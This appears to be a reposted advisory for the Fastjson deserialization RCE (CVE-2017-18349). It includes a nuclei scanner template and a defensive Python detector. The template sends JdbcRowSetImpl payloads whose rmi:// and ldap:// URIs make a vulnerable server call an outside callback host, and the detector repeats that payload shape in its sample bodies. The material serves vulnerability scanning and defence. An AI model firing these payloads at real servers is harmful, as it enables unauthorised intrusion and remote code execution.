Fastjson Deserialization Remote Code Execution Vulnerability

Vulnerability information

Vulnerability name: Fastjson Deserialization Remote Code Execution Vulnerability

Vulnerability ID:

  • CVE: CVE-2017-18349

Vulnerability type: Deserialization

Severity: Critical

Description: Fastjson is a high-performance JSON processing library open-sourced by Alibaba and widely used for JSON serialization and deserialization in Java applications. Because of its efficiency and ease of use, Fastjson has been adopted in a large number of Java applications, including web applications and microservice architectures.

The vulnerability exists in Fastjson versions before 1.2.25: the parseObject function is subject to a deserialization flaw when handling maliciously constructed JSON requests. An attacker can craft JSON data that places an rmi:// or ldap:// URI in the dataSourceName field to trigger remote code execution. The technical root cause is that Fastjson does not adequately validate the legitimacy of input data during deserialization, which allows an attacker to inject malicious code.

An attacker who successfully exploits this vulnerability can execute arbitrary code on the target system, take full control of it, access sensitive data, and even establish a persistent backdoor. Because the vulnerability requires no authentication to exploit and the attack can be automated, it poses an extremely high security risk to systems running affected Fastjson versions. Organizations should immediately upgrade Fastjson to 1.2.25 or later and apply additional mitigations, such as disabling the autotype feature, enforcing strict whitelist filtering of @type annotations, and using a WAF to filter malicious requests.

Vendor: alibaba

Product: fastjson

Affected versions: version < 1.2.25

Source: https://github.com/projectdiscovery/nuclei-templates/blob/5f98107f9d8b99430903e73793861a9ba3beaf2c/http%2Fcves%2F2017%2FCVE-2017-18349.yaml

Type: projectdiscovery/nuclei-templates:github issues

POC details


id: CVE-2017-18349

info:
  name: Fastjson Insecure Deserialization - Remote Code Execution
  author: night
  severity: critical
  description: |
    parseObject in Fastjson before 1.2.25, as used in FastjsonEngine in Pippo 1.11.0 and other products, allows remote attackers to execute arbitrary code via a crafted JSON request, as demonstrated by a crafted rmi:// URI in the dataSourceName field of HTTP POST data to the Pippo /json URI, which is mishandled in AjaxApplication.java.
  impact: |
    Successful exploitation allows complete system compromise through remote code execution, enabling attackers to execute arbitrary commands, access sensitive data, and establish persistent backdoors on the target system.
  remediation: |
    Update Fastjson to version 1.2.25 or later, which includes security patches for this vulnerability. Disable autotype functionality by setting `fastjson.parser.autoTypeSupport=false`. Implement strict whitelist filtering for `@type` annotations, and validate and sanitize all JSON input. Use Web Application Firewalls (WAF) to filter malicious requests, and regularly audit dependencies for known vulnerabilities. Consider migrating to safer JSON parsing libraries like Jackson with secure configurations.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2017-18349
    - https://github.com/alibaba/fastjson/wiki/security_update_20170315
    - https://github.com/pippo-java/pippo/issues/466
    - https://github.com/h0cksr/Fastjson--CVE-2017-18349-
    - https://fortiguard.com/encyclopedia/ips/44059
    - https://www.exploit-db.com/exploits/45983
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2017-18349
    cwe-id: CWE-20
    epss-score: 0.7075
    epss-percentile: 0.98594
    cpe: cpe:2.3:a:alibaba:fastjson:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: alibaba
    product: fastjson
  tags: cve,cve2017,fastjson,deserialization,rce,oob,oast

variables:
  rmi_payload: "rmi://{{interactsh-url}}/{{randstr}}"
  ldap_payload: "ldap://{{interactsh-url}}/{{randstr}}"

http:
  - method: POST
    path:
      - "{{BaseURL}}/json"
      - "{{BaseURL}}/api/json"

    headers:
      Content-Type: application/json
      Accept: application/json

    body: |
      {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "{{rmi_payload}}",
        "autoCommit": true
      }

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol,'dns')"
          - "contains(content_type, 'application/json')"
          - "contains_all(body, 'autoCommit','set property error')"
        condition: and

    extractors:
      - type: kval
        kval:
          - interactsh_ip

  - method: POST
    path:
      - "{{BaseURL}}/json"
      - "{{BaseURL}}/api/json"
      - "{{BaseURL}}/parse"
      - "{{BaseURL}}/deserialize"

    headers:
      Content-Type: application/json
      Accept: application/json

    body: |
      {
        "@type": "com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName": "{{ldap_payload}}",
        "autoCommit": true
      }

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol,'dns')"
          - "contains(content_type, 'application/json')"
          - "contains_all(body, 'autoCommit','set property error')"
        condition: and

    extractors:
      - type: kval
        kval:
          - interactsh_ip

  - method: POST
    path:
      - "{{BaseURL}}/json"
      - "{{BaseURL}}/api/json"
      - "{{BaseURL}}/parse"
      - "{{BaseURL}}/deserialize"

    headers:
      Content-Type: application/json
      Accept: application/json

    body: |
      {
        "data": {
          "@type": "com.sun.rowset.JdbcRowSetImpl",
          "dataSourceName": "{{rmi_payload}}",
          "autoCommit": true
        }
      }

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol,'dns')"
          - "contains(content_type, 'application/json')"
          - "contains_all(body, 'autoCommit','set property error')"
        condition: and

    extractors:
      - type: kval
        kval:
          - interactsh_ip

  - method: POST
    path:
      - "{{BaseURL}}/json"

    headers:
      Content-Type: application/json
      Accept: application/json

    body: |
      {
        "b": {
          "@type": "com.sun.rowset.JdbcRowSetImpl",
          "dataSourceName": "{{ldap_payload}}",
          "autoCommit": true
        }
      }

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol,'dns')"
          - "contains(content_type, 'application/json')"
          - "contains_all(body, 'autoCommit','set property error')"
        condition: and

    extractors:
      - type: kval
        kval:
          - interactsh_ip
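As an added defensive example (not part of this page or of the nuclei-templates project), the following Python inspects JSON request bodies for the JdbcRowSetImpl/JNDI shape the template above sends, at any nesting depth, and checks a response for the error fragment the template's matcher relies on. The sample bodies and the callback.invalid host are constructed for illustration.

```python
"""Detect Fastjson JdbcRowSetImpl / JNDI deserialization probes in JSON bodies."""
import json
from urllib.parse import urlsplit

# Gadget class named by the PoC's @type, and the URI schemes it dereferences.
GADGET_CLASS = "com.sun.rowset.JdbcRowSetImpl"
JNDI_SCHEMES = {"rmi", "ldap"}
# Response fragment the template's matcher keys on (Fastjson setter failure).
RESPONSE_INDICATOR = "set property error"


def _walk(node):
    """Yield every dict inside a parsed JSON document, at any nesting depth."""
    if isinstance(node, dict):
        yield node
        for value in node.values():
            yield from _walk(value)
    elif isinstance(node, list):
        for item in node:
            yield from _walk(item)


def find_jndi_gadgets(body: str):
    """Return (type, dataSourceName) pairs for each suspicious object.

    Flags any object that names the gadget class via @type, or whose
    dataSourceName is a JNDI URI; covers both the top-level and the
    nested ("data"/"b") shapes the template sends.
    """
    try:
        doc = json.loads(body)
    except (ValueError, TypeError):
        return []  # Not JSON: nothing for Fastjson to deserialize here.
    hits = []
    for obj in _walk(doc):
        type_name = obj.get("@type")
        dsn = obj.get("dataSourceName")
        scheme = urlsplit(dsn).scheme.lower() if isinstance(dsn, str) else ""
        if type_name == GADGET_CLASS or scheme in JNDI_SCHEMES:
            hits.append((type_name, dsn))
    return hits


def response_indicates_probe(response_body: str) -> bool:
    """Mirror the template's matcher: autoCommit echoed with a setter error."""
    return "autoCommit" in response_body and RESPONSE_INDICATOR in response_body


# Constructed sample bodies modelled on the PoC (not real captured traffic).
SAMPLES = {
    "top_level": '{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://callback.invalid/x","autoCommit":true}',
    "nested": '{"data":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://callback.invalid/x","autoCommit":true}}',
    "benign": '{"user":"alice","dataSourceName":"jdbc:mysql://db.internal/app"}',
}
```

The checks are suitable for a WAF rule or for triaging access logs; a JDBC-style dataSourceName does not trip the JNDI scheme check.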



http://example.com/2025/07/22/github_1538492750/
Author: lianccc
Published: July 22, 2025